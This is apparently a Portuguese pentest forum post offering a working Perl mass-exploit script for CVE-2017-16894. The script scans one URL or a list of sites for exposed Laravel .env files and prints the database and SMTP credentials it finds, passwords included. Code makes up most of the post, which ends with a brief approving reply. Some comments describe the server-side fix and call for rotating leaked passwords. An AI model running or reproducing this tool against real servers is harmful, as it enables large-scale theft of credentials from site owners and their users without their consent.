ENV Mass Exploit / LFD

Postagem de conteúdo sobre pentest

ENV Mass Exploit / LFD

Post by v4p0r » Sun Nov 26, 2017 7:58 pm

ENV Mass Exploit

Descrição:

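Script criado para exploração em massa da falha abaixo:
[CVE-2017-16894] - Laravel Environment Variables - Read passwords and login credentials
A falha é o arquivo .env da aplicação ficar acessível pelo servidor web; do lado do servidor, ela deixa de existir quando o document root aponta para o diretório public/ do Laravel ou quando o acesso a arquivos iniciados por ponto é bloqueado.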

PoC: http://whiteboyz.xyz/laravel-env-file-vuln.html
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16894


#!/usr/bin/perl
# [CVE-2017-16894] - Laravel Environment Variables - Read passwords and login credentials
# CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16894
# POC: http://whiteboyz.xyz/laravel-env-file-vuln.html
# Coder by v4p0r 20 NOV 2017

use strict;
use warnings;
use Getopt::Long;
use WWW::Mechanize;

# Wipe the terminal before any output: Windows gets "cls", every other
# platform gets "clear". Both are passed to system() as a fixed string.
my $usr = $^O;
system( $usr eq "MSWin32" ? "cls" : "clear" );

# Raw command-line argument count, taken before GetOptions() removes the
# switches it recognises from @ARGV; the usage check further down reads it.
my $banner = @ARGV;
my $helpzinho;

# --list-site/-l and --site/-s are stored in package variables, which the
# rest of the script reads as $main::list and $main::site.
GetOptions(
    'help|h'        => \$helpzinho,
    'site|s=s'      => \$main::site,
    'list-site|l=s' => \$main::list,
);

# --help prints the usage text; banner() ends with exit, so nothing below
# runs in that case.
banner() if $helpzinho;

# Start-up banner, printed on every run that gets past --help.
print
    "================================\n",
    " #   Exploit: ENV EXPLOIT       \n",
    " #   Coder: v4p0r               \n",
    " #   Date: 21 NOV 2017          \n",
    " #   CVE - 2017-16894           \n",
    "================================\n";


# Single-target mode (--site): fetch the URL exactly as given and treat a
# response body containing the APP_ENV key as a readable Laravel .env file.
# A match means the web server is handing out the application's .env; on the
# server side that stops once the document root is Laravel's public/
# directory or requests for dotfiles are denied.
if ($main::site) {
    my $target = $main::site;
    print $target;

    my $body = request($target);

    if ( $body !~ /APP_ENV/ ) {
        print "[NOT VULN]";
    }
    else {
        get_config($body);

        # A hit ends the run here; a miss continues with the code below.
        exit;
    }
}

# Short usage notice: shown, followed by exit, when the raw argument count
# captured at start-up was 0 or 1.
if ( $banner < 2 ) {
    print
        " # Coder: v4p0r             \n",
        " # Team: Yunkers Crew             \n",
        " # Twitter: 0x777null             \n",
        " # Skype: drx.priv\n",
        "================================  \n",
        " # Usage: perl $0 --help\n",
        "================================  \n";

    exit;
}

# List mode (--list-site): the file named by $main::list holds one target per
# line. The whole file is read into memory before the first request is made.
open( my $web, '<', $main::list ) or die "\n [Lista nao selecionada]";
my @sites = <$web>;

# Lines are used as read (no chomp), so each $url still ends in its newline.
for my $url (@sites) {
    print "\n[SITE]: $url";

    my $body = request($url);

    # Same test as single-target mode: the APP_ENV key in the body is taken
    # as proof that the server returned a .env file.
    if ( $body !~ /APP_ENV/ ) {
        print "[NOT VULN]";
        next;
    }

    get_config($body);
}

# Fetch one URL and return the response body as a string.
#
# $url gets an "http://" prefix when it does not already start with http://
# or https://. The client is restricted to the http and https schemes, a
# 3-second timeout and a max_size of 1024000. The response status is not
# inspected here; callers only look at the returned body.
#
# For log review: every request made through this sub carries the fixed
# User-Agent "Mozilla 5.0", and the script's own usage example points it at
# a /.env path.
sub request {
    my ($url) = @_;

    unless ( $url =~ m{^https?://} ) {
        $url = 'http://' . $url;
    }

    my $client = WWW::Mechanize->new( agent => 'Mozilla 5.0' );
    $client->timeout(3);
    $client->max_size(1024000);
    $client->protocols_allowed( [ 'http', 'https' ] );

    $client->get($url);

    my $body = $client->content;
    return $body;
}

# Print the database and mail settings found in a fetched .env body.
#
# $env is the response body as a single string. For every key the first
# "KEY=..." occurrence is reported, from the "=" to the end of that line; a
# key that does not occur prints as "Nothing". The key name is not anchored
# to the start of a line. Values are printed in clear, passwords included, so
# whatever this reports for a host has to be treated as disclosed and rotated
# on that host.
sub get_config {
    my ($env) = @_;

    # Each entry: section heading, then the keys listed under it in order.
    my @sections = (
        [
            "\n[DATABASE CONFIG]\n\n",
            [
                qw(
                    DB_CONNECTION DB_HOST DB_PORT
                    DB_DATABASE DB_USERNAME DB_PASSWORD
                )
            ],
        ],
        [
            "\n[SMTP CONFIG]\n\n",
            [
                qw(
                    MAIL_DRIVER MAIL_HOST MAIL_PORT MAIL_FROM_NAME
                    MAIL_FROM_EMAIL MAIL_USERNAME MAIL_PASSWORD MAIL_ENCRYPTION
                )
            ],
        ],
    );

    for my $section (@sections) {
        my ( $heading, $keys ) = @{$section};
        print $heading;

        for my $key ( @{$keys} ) {
            # List-context match: $value is the captured text or undef.
            my ($value) = $env =~ /${key}=(.*)/;
            print "[${key}]: " . ( $value // 'Nothing' ) . "\n";
        }
    }
}

# Print the ASCII-art header and the option summary, then end the program.
# Called for --help; it never returns to the caller.
sub banner {
	# Single-quoted q{}: the "$1" in the art is literal text, not a variable.
	print q{
 *        . . . . o o o o o
 *               _____      o      
 *      ____====  ]OO|_n_n__][.     
 *     [________]_|__|________)<    
 *      oo    oo  'oo OOOO-| oo\\_   
 *  +--+--+--+--+--+--+--+--+-$1-+--+--+--+--+
	
	};

	# $0 is the script name as invoked.
	print
		"\n Usage: $0 <comando>\n\n",
		" [+] Comandos:\n",
		"   --help         [Ajuda com os comandos]\n",
		"   --list-site|l  [Seleciona sua lista de sites]\n",
		"   --site|s       [Unico alvo]\n",
		" [!] Exemplos:\n",
		"   perl $0 -l sites.txt\n",
		"   perl $0 -s  http://localhost/.env\n";

	exit;
}


Re: ENV Mass Exploit / LFD

Post by Kodo no Kami » Sat Dec 16, 2017 6:47 pm

show mano \o

Conheça o sistema e manipule ele, se limite ao sistema e seja manipulado por ele ~kodo no kami
